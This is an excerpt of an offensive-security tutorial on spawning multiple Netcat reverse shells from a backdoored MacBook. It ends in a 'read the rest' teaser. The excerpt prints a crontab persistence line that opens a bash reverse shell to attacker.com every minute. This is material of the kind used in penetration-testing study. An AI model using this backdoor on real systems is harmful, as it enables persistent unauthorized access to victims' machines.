An attacker can create three, five, or even ten new Netcat connections to a compromised MacBook with one command. Performing complex post-exploitation attacks might otherwise be difficult from a single shell without this essential trick.
Why Create Multiple Netcat Threads?
With some macOS post-exploitation attacks, more than one shell may be required. Spawning additional Netcat connections from a single backdoor is possible but can be cumbersome and inconvenient. So I came up with a simple solution that relies on the current date to predict the next time and port number the backdoor will use.
Five Netcat connections established at once.
The GIF above demonstrates five Netcat connections being established at the same time. We can see how convenient it is to navigate multiple connections as some basic situational awareness attacks with system_profiler are performed.
The following string is an example of a Bash command, used commonly with crontab to backdoor macOS. It creates a single TCP connection to the attacker's system. It's a well-known method for establishing TCP connections to a Netcat listener and can be embedded into the OS and executed every sixty seconds.
* * * * * bash -i >& /dev/tcp/attacker.com/8080 0>&1
Crontab will attempt to connect to the attacker's server on port 8080 every time. However, if a connection has already been established, the command will silently ..
Support the originator by clicking the read the rest link below.
